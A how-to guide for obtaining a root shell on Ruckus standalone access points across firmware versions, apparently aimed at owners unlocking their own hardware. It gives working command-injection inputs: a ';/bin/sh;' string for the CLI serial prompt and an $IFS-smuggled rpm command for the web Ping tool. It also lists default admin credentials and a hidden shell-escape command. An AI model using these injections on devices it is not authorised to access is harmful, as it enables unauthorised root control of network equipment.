Obtaining a root shell on Standalone/Solo Ruckus APs
The Ruckus CLI includes a hidden !v54! command which exits to a root shell.
- Very old AP firmware checks a configuration setting
cli_esc2shell_okto decide whether the!v54!command is available. - Newer AP firmware checks an encrypted serial# to decide whether the
!v54!command is available.
The encrypted serial# is saved to a file using theRuckuscommand, then the!v54!command usessesameto decrypt this file.
NOTE
If you bought a used Ruckus AP then it is very likely to be running SmartZone or ZoneDirector firmware.
You can try the Firmware 9.8 - 112.0 steps, below, to see if it works. Otherise you'll need to install Solo or Unleashed firmware.
Firmware 3.x, 5.x, 6.x, 9.9 - 9.13, 10.x
Your AP is running SmartZone or ZoneDirector firmware rather than Solo firmware.
You can try the Firmware 9.8 - 112.0 steps, below, to see if they work.
Otherise you'll need to install Solo or Unleashed firmware (see the next section).
Firmware released after November 2019 (e.g. >112.0)
Sorry, I don't have a method to bypass the serial# check on newer Standalone/Solo AP firmwares.
If your AP was released before mid-2019 then you can downgrade to an older Solo firmware.
Alternatively, if your AP has Unleashed firmware available then you can install and use this to obtain a root shell.
For the R730, you can download the ZoneDirector 10.1.2.0.120 Software Release, extract and install the R730 firmware, then follow the Firmware 9.8 - 112.0 steps, below.
This tool will extract the R730 AP Image from the ZoneDirector Software Image:-
Manual Extraction Steps
Decrypt the image, then use an archive tool like 7-Zip to extract the firmwares/ap-patch/patch000/ap-arm-11ax/10.1.2.0.120/rcks_fw.bl7.main AP image file.
Firmware 9.8 - 112.0 (excl. 110.0.0.0.2005)
These AP firmware versions don't sanitize the encrypted serial#.
So we can use the Ruckus command to inject a root shell.
TIP
The injection only needs to be performed once.
SSH to the AP
$ ssh 192.168.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes256-cbcLogin. Default username is "super", password is "sp-admin".
Command injection
rkscli: RuckusNow type ";/bin/sh;" including the quotes and hit enter (you won't be able to see what you're typing)
grrrrTIP
Instead of grrrr, another dog noise could be printed to the screen.
Escape to shell
rkscli: !v54!
What's your chow:Now hit enter
BusyBox v1.15.2 (2015-07-21 22:07:19 PDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#You have a root shell.
TIP
If you don't see a BusyBox shell prompt, and instead see just the rkscli: prompt then the injection hasn't worked.
Repeat the command injection step, ensuring you type ";/bin/sh;" including the quotes.
Firmware Pre-9.8
These AP firmware versions don't sanitize the input to the Ping diagnostic tool.
So we can use Ping to enable cli_esc2shell_ok.
TIP
The Ping enablement only needs to be performed once.
Connect to the AP's Web UI
Login. Default username is "super", password is "sp-admin".
Enable shell escape
Go to Administration > Diagnostics, paste |rpm${IFS}-p${IFS}cli_esc2shell_ok="t" into the Ping: textbox & hit Run test.
SSH to the AP
$ ssh 192.168.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes256-cbcLogin. Default username is "super", password is "sp-admin".
Escape to shell
rkscli: !v54!
What's your chow:Now hit enter
BusyBox v1.15.2 (2015-07-21 22:07:19 PDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#You have a root shell.
TIP
If you don't see a BusyBox shell prompt, and instead see just the rkscli: prompt then the injection hasn't worked.
If your firmware version isn't 9.x then it's very likely your AP is running SmartZone or Cloud firmware rather than Solo firmware.
Read the information in the Firmware 3.x, 5.x, 6.x, 9.9 - 9.13, 10.x section.